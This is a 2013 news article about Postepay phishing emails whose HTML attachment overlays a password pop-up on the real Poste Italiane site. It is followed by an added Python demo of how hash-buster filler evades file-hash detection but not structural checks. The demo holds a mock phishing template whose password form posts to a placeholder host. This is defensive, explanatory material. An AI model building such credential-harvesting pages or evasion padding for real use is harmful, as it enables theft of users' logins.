Cybercriminals use clever tactics to trick users and antivirus solutions

Apr 10, 2013 19:41 GMT

Security experts are advising users of Postepay cards, the pre-paid rechargeable cards of Poste Italiane, to be on the lookout for phishing emails designed to trick them into handing over the credentials for their Postepay accounts.

The emails, entitled “Ultima notifica da noi, attivare il nuovo sistema” (Last notification from us, activate the new system), appear to come from a legitimate Poste Italiane email address.

To make them less suspicious, they don’t contain any links. However, they do come with an .html file attached which, according to security firm Sophos, is fairly clever.

When opened, “Cliente.html” loads a legitimate Poste Italiane website. However, a pop-up message is displayed on top of it via an iFrame injection.

The pop-up window asks users to enter their usernames and passwords.

In this particular scheme, the cybercriminals use “hash busters” – represented by random strings of text – in an effort to bypass security solutions.

The cybercrooks appear to have a “thing” for Shakespeare, since the hash buster they’re utilizing is taken from Hamlet. More precisely, it’s the renowned “to be, or not to be” part.

However, the tactic isn’t very effective against comprehensive security solutions. Sophos products detect the malicious HTML file as Troj/Ifrin-A.
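Why hash busters defeat exact file-hash matching but not structure-based checks, shown as an added example that is not from the original article and is not Sophos' detection logic. The sample markup, the placement of the filler text (an HTML comment and a hidden element) and the example.invalid URLs are constructed assumptions.

```python
import hashlib
from html.parser import HTMLParser

class Skeleton(HTMLParser):
    """Records tag structure only; text nodes and comments are ignored."""
    def __init__(self):
        super().__init__()
        self.tokens, self.has_iframe, self.has_password = [], False, False

    def handle_starttag(self, tag, attrs):
        # Keep tag and attribute names; drop values and all free text.
        self.tokens.append(tag + "[" + ",".join(sorted(k for k, _ in attrs)) + "]")
        self.has_iframe |= tag == "iframe"
        input_type = (dict(attrs).get("type") or "").lower()
        self.has_password |= tag == "input" and input_type == "password"

def file_hash(html):
    """Exact-match fingerprint: changes with any byte of filler text."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()

def analyse(html):
    """Filler-independent fingerprint plus a simple attachment heuristic."""
    parser = Skeleton()
    parser.feed(html)
    parser.close()
    skeleton = "|".join(parser.tokens)
    return {
        "structure_hash": hashlib.sha256(skeleton.encode("utf-8")).hexdigest(),
        # An HTML attachment that frames a page and also asks for a password.
        "iframe_plus_password": parser.has_iframe and parser.has_password,
    }

# Constructed samples: identical markup, different hash-buster filler.
TEMPLATE = """<html><body>
<!-- {filler} -->
<iframe src="https://legit-site.example.invalid/"></iframe>
<div style="display:none">{filler}</div>
<form action="https://placeholder.example.invalid/">
<input type="text" name="u"><input type="password" name="p">
</form>
</body></html>"""
SAMPLE_A = TEMPLATE.format(filler="To be, or not to be, that is the question")
SAMPLE_B = TEMPLATE.format(filler="Whether 'tis nobler in the mind to suffer")

if __name__ == "__main__":
    for name, sample in (("A", SAMPLE_A), ("B", SAMPLE_B)):
        result = analyse(sample)
        print(name, file_hash(sample)[:16], result["structure_hash"][:16],
              result["iframe_plus_password"])
```

The two file hashes differ while the structure hash and the heuristic flag are the same for both samples, so a blocklist of file hashes misses the second variant and a structural check does not.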

Italian users are advised to avoid opening files attached to notifications. The messages might look legitimate but, in reality, companies usually don’t attach files to emails and they don’t request users to hand over personal or financial information.

If you’re a victim of this scam, make sure that you change your password immediately.

“Attacks like this are, once again, reminders for all of us to be careful about what email attachments we open on our computers - even if the email appears to come from an organisation that you regularly do business with,” Sophos’ Graham Cluley noted.